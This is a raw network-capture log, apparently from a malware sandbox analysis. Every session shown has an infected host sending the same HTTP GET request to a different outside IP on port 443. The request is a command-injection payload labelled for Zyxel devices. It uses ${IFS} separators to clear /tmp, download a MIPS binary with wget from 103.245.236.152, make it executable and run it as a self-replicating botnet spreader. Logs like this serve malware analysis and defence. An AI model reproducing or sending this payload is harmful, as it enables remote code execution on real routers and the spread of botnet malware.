                                      Jan 14, 2024 15:50:35.023907900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1391192.168.2.1437194206.91.40.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023946047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1392192.168.2.1458878195.245.208.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023986101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1393192.168.2.1456766164.136.70.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024032116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1394192.168.2.1449012151.69.34.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024085045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1395192.168.2.1451796187.177.96.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024127960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1396192.168.2.145810820.204.38.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024168968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1397192.168.2.1449962165.117.73.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024208069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1398192.168.2.1450850161.28.25.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024238110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1399192.168.2.1455546125.59.67.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024276972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1400192.168.2.143533672.159.157.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024303913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1401192.168.2.145959691.216.157.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024354935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1402192.168.2.145692865.62.135.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024389029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1403192.168.2.1454252150.163.255.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024436951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1404192.168.2.1434328107.66.178.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024463892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1405192.168.2.143792817.225.253.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024483919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1406192.168.2.1449768155.76.40.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024539948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1407192.168.2.1447926204.184.174.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024564028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1408192.168.2.1452188216.65.51.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024605989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1409192.168.2.1457574221.215.208.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024638891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1410192.168.2.1455330110.193.103.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024688959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1411192.168.2.1437978197.52.126.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024738073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1412192.168.2.1442472126.179.196.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024777889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1413192.168.2.1454150107.247.225.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024832010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1414192.168.2.145367693.109.226.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024864912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1415192.168.2.1439454138.246.173.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024909973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1416192.168.2.1434766164.179.180.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024936914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1417192.168.2.1432922194.10.109.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.024970055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1418192.168.2.1438608103.183.80.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025013924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1419192.168.2.1458464218.73.164.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025072098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1420192.168.2.145994882.139.24.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025095940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1421192.168.2.143540270.146.64.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025147915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1422192.168.2.1443186182.232.193.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025187969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1423192.168.2.1453484183.11.99.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025252104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1424192.168.2.144818683.63.169.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025278091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1425192.168.2.1434538144.232.116.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025310040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1426192.168.2.145798480.61.223.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025343895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1427192.168.2.1443802204.38.245.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025410891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1428192.168.2.1456970128.64.25.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025443077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1429192.168.2.145733241.43.255.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025490999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1430192.168.2.143608689.182.45.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025525093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1431192.168.2.145835466.82.133.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025559902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1432192.168.2.1436696206.154.30.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025580883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1433192.168.2.144160475.81.89.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025645971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1434192.168.2.144496440.64.111.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025671005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1435192.168.2.14540229.220.63.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025723934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1436192.168.2.143665236.212.4.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025758028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1437192.168.2.1443928125.231.188.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025803089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1438192.168.2.1455148128.212.185.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025849104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1439192.168.2.144260247.60.23.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025913954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1440192.168.2.1446872183.216.186.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.025974035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1441192.168.2.145595480.122.145.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026015997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1442192.168.2.1446402212.135.12.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026046991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1443192.168.2.1455130121.5.187.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026086092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1444192.168.2.146091861.21.173.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026139975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1445192.168.2.1440030145.10.147.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026170969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1446192.168.2.1438682168.24.135.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026211023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1447192.168.2.1454886197.74.233.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026278019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1448192.168.2.143481818.57.151.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026314020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1449192.168.2.1447888183.58.67.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026360989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1450192.168.2.1435362113.92.69.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026412964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1451192.168.2.145414688.44.68.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026448011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1452192.168.2.1435786180.224.192.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026499033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1453192.168.2.144352882.127.40.2443
                                      TimestampBytes transferredDirectionData
